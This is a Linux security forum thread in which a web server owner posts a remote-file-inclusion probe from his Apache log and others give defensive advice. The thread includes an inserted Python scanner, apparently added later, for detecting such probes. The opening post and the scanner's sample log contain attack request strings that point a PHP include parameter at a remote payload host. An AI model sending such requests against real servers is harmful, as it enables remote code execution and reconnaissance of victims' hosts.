Linux - Security
This forum is for all security-related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - 80.67.23.3 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-" repeated 4 times. Just the time and date are different. I copied response.txt to my web server and ran it. This is what was displayed:
Osirys
uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers) 0sirys was here ..
uname -a: Linux zombie13 2.6.22.19-0.1-default #1 SMP 2008-10-14 22:17:43 +0200 x86_64
os: Linux
id: uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers)
free: 5.13 Gb
used: 44.13 Gb
total: 49.26 Gb
Does this information present a security risk? If so, what may be done to prevent attacks using this information?
I have blocked the ip range 80.67.23.0 - 80.67.23.255 to prevent further attempts coming from domainfactory GmbH.
I suppose the first thing that security geeks like me ask is, is it necessary for you to support file uploads on your server?
Any services that are not ESSENTIAL to operation should be disabled on a public-facing box.
Also, are you running the latest versions of both Apache AND PHP? (I mean that when you check your distro's update-manager you find no updates necessary.)
These zombie-makers come out of the woodwork from time to time and it's necessary to deal with them ONLY when they can affect a service you need. If you don't need it, just disable the service and update.
http://www.jkijmond.nl is now fixed. Usually, such sites are compromised (where the owner is unaware) and hosting/serving malware as third party.
I'm sure you'll see tons of such traffic in your logs (I do). As long as you know that you don't allow uploads, you're ok (but check from time to time anyways).
Oh, and one thing I'd NEVER do is download questionable code and execute it, especially without viewing and assessing the code first. Fortunately, it appears that that script was just gathering data. Someone who may be keeping a list of possible hosts to attack could use that type of data.
I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - ....
Does this information present a security risk? If so what may be done to ...
I have blocked the ip range 80.67.23.0 - 80.67.23.255 to prevent further ...
TIA for your advice,
Philip
Hi everyone,
Thank you for your feedback. Currently, I do not allow file uploads. Updates are done regularly, i.e. when I am notified updates are available. One discovery is my current router does not allow me to block specific ip addresses or ip ranges. The one that allows me to do that blocks my VOIP phone line.
Now that I am learning to create web sites with PHP and MySQL file uploads may be allowed in the future. My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input etc.
My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input etc.
Post a pointer to what you found?
BTW, if you're researching PHP security please look up Snort, Suhosin, PHP IDS and mod_security. And remember security is multi-layered and a continuous process.
Howdy again, I just got another update email for this post and I re-read from the beginning...
Notwithstanding the fact that, ultimately, this may be originating at some zombie attempting an upload exploit, remember the critical element here... The response code: 404 (Your server told it to piss off)
Naturally, zombies just roam through the web tapping everybody's door to see who was dumb enough to leave the key in the lock outside. I've had one server running three virtual hosts and they each have an entry in their log (after only one day of operating!!!) from some "Morpheus F**king Scanner" (no joke, that was the actual text in the log) zombie.
But the response codes are all 404s so there's no risk to me.
Keep patched, disable unnecessary services, and keep an eye on those logs for things that DON'T go 404...
Oh, and as unSpawn asked, please do submit any tweaks you have for scripting security, etc.
Excellent posting, btw, everyone, this is one of the first security-related threads I've seen that DIDN'T go all crazy with advice to block everyone's ip and start wearing foil hats.
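The log entry from the first post and the advice above to watch for things that don't go 404, worked into a small access_log scanner. This is an added example, not code from the thread; the log lines are constructed (two modelled on the entry Philip posted, the others using documentation IP ranges), and the function and field names are my own.

```python
"""Flag remote-file-inclusion (RFI) probes in an Apache access_log: a query parameter whose value is a URL."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format; the referer and user-agent fields are not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
REMOTE_RE = re.compile(r'^(?:https?|ftp|php|data|expect)://', re.IGNORECASE)  # remote URL or PHP stream wrapper

# Constructed sample log (not real traffic): two lines modelled on the probe in the first post,
# one probe against a script that answered 200, and one benign request.
SAMPLE_LOG = """\
80.67.23.3 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-" "-"
80.67.23.3 - - [10/Dec/2008:06:41:02 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-" "-"
192.0.2.10 - - [10/Dec/2008:07:02:11 -0500] "GET /gallery/view.php?page=http://198.51.100.7/r.txt? HTTP/1.0" 200 2310 "-" "Mozilla/4.0"
192.0.2.11 - - [10/Dec/2008:07:05:40 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def rfi_params(target):
    """Return (name, url) pairs for query parameters whose value is a remote source."""
    hits = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:  # parse_qs already percent-decodes, so %0D is a CR here
            # Probes append junk such as %0D?? to cut off a suffix the script adds; keep only the URL part.
            url = re.split(r'[\x00-\x1f]', value)[0].strip()
            if REMOTE_RE.match(url):
                hits.append((name, url))
    return hits

def verdict(status):
    """What the status code tells a defender about a flagged request."""
    if status == "404":
        return "bounced"   # nothing at that path; the probe went nowhere
    if status.startswith("2"):
        return "served"    # the script exists: check it never hands the value to include()
    return "other"

def scan_log(text):
    """Parse each line and return the flagged RFI attempts with a verdict."""
    flagged = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, url in rfi_params(m["target"]):
            flagged.append({"ip": m["ip"], "time": m["ts"], "param": name, "remote": url,
                            "status": m["status"], "verdict": verdict(m["status"])})
    return flagged
```

A "served" hit only means the script exists and answered; confirm it never passes the parameter to include() and that allow_url_include is off in php.ini.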
BTW, if you're researching PHP security please look up Snort, Suhosin, PHP IDS and mod_security. And remember security is multi-layered and a continuous process.
This site is very helpful -Virginia Tech (http://www.hosting.vt.edu/tutorials/phpmysql/). However, the more advanced features in this tutorial will only work when all required apache, php and mysql modules are installed.
Thanks for the heads up regarding security. This is why I am taking things slowly, building the web apps with security in mind while researching the security issues involved in hosting on a public-facing server.